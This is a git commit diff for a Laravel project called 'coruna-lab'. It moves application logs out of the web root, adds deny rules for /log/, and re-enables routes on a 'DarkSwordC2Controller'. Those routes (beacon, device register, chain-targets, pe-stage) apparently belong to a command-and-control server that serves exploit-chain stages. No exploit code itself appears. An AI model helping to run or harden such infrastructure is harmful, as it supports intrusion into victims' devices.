fix: ds
This commit is contained in:
Binary file not shown.
+13
-5
@@ -183,6 +183,12 @@ https://admin.example.com/c/<ver>/show.htm # Nginx 静态别名 → channel/<ve
|
|||||||
```nginx
|
```nginx
|
||||||
# —— 粘贴到「网站 → 设置 → 配置文件」,放在 location / 和 enable-php 之前 ——
|
# —— 粘贴到「网站 → 设置 → 配置文件」,放在 location / 和 enable-php 之前 ——
|
||||||
|
|
||||||
|
# 禁止下载应用日志(即使 public/log 里还留着旧文件)
|
||||||
|
location ^~ /log/ {
|
||||||
|
deny all;
|
||||||
|
return 404;
|
||||||
|
}
|
||||||
|
|
||||||
location ~ "^/web/[0-9a-f]{32}/" {
|
location ~ "^/web/[0-9a-f]{32}/" {
|
||||||
try_files $uri =404;
|
try_files $uri =404;
|
||||||
add_header Cache-Control "public, max-age=300";
|
add_header Cache-Control "public, max-age=300";
|
||||||
@@ -603,15 +609,17 @@ tail -n 80 /www/server/php/82/var/log/php-fpm.log
|
|||||||
|
|
||||||
|
|
||||||
|
|
||||||
### `mkdir(): Permission denied` at `Helpers.php` / `public/log`
|
### `mkdir(): Permission denied` at `Helpers.php` / `storage/logs`
|
||||||
|
|
||||||
C2 中间件会写 `public/log/c2/Ymd.log`(旧版)和 `public/log/xxbb/Ymd.log`(新版短路径)。站点运行用户(宝塔多为 `www`)对 `public/log` 无写权限时会报错。
|
C2 / 转账日志写在 **Web 根外** `storage/logs/{c2,xxbb,transfer,ds}/Ymd.log`。站点运行用户(宝塔多为 `www`)对 `storage` 无写权限时会报错。
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
cd /www/wwwroot/coruna-lab
|
cd /www/wwwroot/coruna-lab
|
||||||
mkdir -p public/log/c2 public/log/xxbb
|
mkdir -p storage/logs/c2 storage/logs/xxbb storage/logs/transfer
|
||||||
chown -R www:www public/log storage bootstrap/cache
|
chown -R www:www storage bootstrap/cache
|
||||||
chmod -R ug+rwx public/log storage bootstrap/cache
|
chmod -R ug+rwx storage bootstrap/cache
|
||||||
|
# 线上若还留着可下载的旧文件,删掉并在 Nginx 加上 location ^~ /log/ { deny all; }
|
||||||
|
rm -rf public/log
|
||||||
```
|
```
|
||||||
|
|
||||||
同时确认网站「运行目录 / 用户」与上述属主一致。部署后建议立刻执行一次,避免首个 C2 请求踩坑。
|
同时确认网站「运行目录 / 用户」与上述属主一致。部署后建议立刻执行一次,避免首个 C2 请求踩坑。
|
||||||
|
|||||||
+2
-1
@@ -5,10 +5,11 @@
|
|||||||
|
|
||||||
RewriteEngine On
|
RewriteEngine On
|
||||||
|
|
||||||
# Builder state must never be served from public/ (defense in depth).
|
# Builder state / leftover app logs must never be served from public/.
|
||||||
RewriteRule ^lab_seeds\.json$ - [F,L]
|
RewriteRule ^lab_seeds\.json$ - [F,L]
|
||||||
RewriteRule ^manifest\.latest\.json$ - [F,L]
|
RewriteRule ^manifest\.latest\.json$ - [F,L]
|
||||||
RewriteRule ^out(/|$) - [F,L]
|
RewriteRule ^out(/|$) - [F,L]
|
||||||
|
RewriteRule ^log(/|$) - [F,L]
|
||||||
|
|
||||||
# Handle Authorization Header
|
# Handle Authorization Header
|
||||||
RewriteCond %{HTTP:Authorization} .
|
RewriteCond %{HTTP:Authorization} .
|
||||||
|
|||||||
+8
-8
@@ -8,13 +8,13 @@ $ds = DarkSwordC2Controller::class;
|
|||||||
// Shared /a /u /nb /event /result are declared in routes/xxbb.php
|
// Shared /a /u /nb /event /result are declared in routes/xxbb.php
|
||||||
// (same URI, DarkSword vs xxbb chosen per request).
|
// (same URI, DarkSword vs xxbb chosen per request).
|
||||||
|
|
||||||
// Route::any('/beacon', [$ds, 'beacon']);
|
Route::any('/beacon', [$ds, 'beacon']);
|
||||||
// Route::any('/war', [$ds, 'war']);
|
Route::any('/war', [$ds, 'war']);
|
||||||
// Route::any('/p', [$ds, 'p']);
|
Route::any('/p', [$ds, 'p']);
|
||||||
// Route::any('/stats', [$ds, 'stats']);
|
Route::any('/stats', [$ds, 'stats']);
|
||||||
|
|
||||||
// Route::any('/api/ds/log', [$ds, 'log']);
|
Route::any('/api/ds/log', [$ds, 'log']);
|
||||||
// Route::any('/api/ds/device/register', [$ds, 'register']);
|
Route::any('/api/ds/device/register', [$ds, 'register']);
|
||||||
// Route::any('/api/ds/chain-targets', [$ds, 'chainTargets']);
|
Route::any('/api/ds/chain-targets', [$ds, 'chainTargets']);
|
||||||
|
|
||||||
// Route::any('/api/ds/pe-stage/{name}', [$ds, 'peStage']);
|
Route::any('/api/ds/pe-stage/{name}', [$ds, 'peStage']);
|
||||||
|
|||||||
Reference in New Issue
Block a user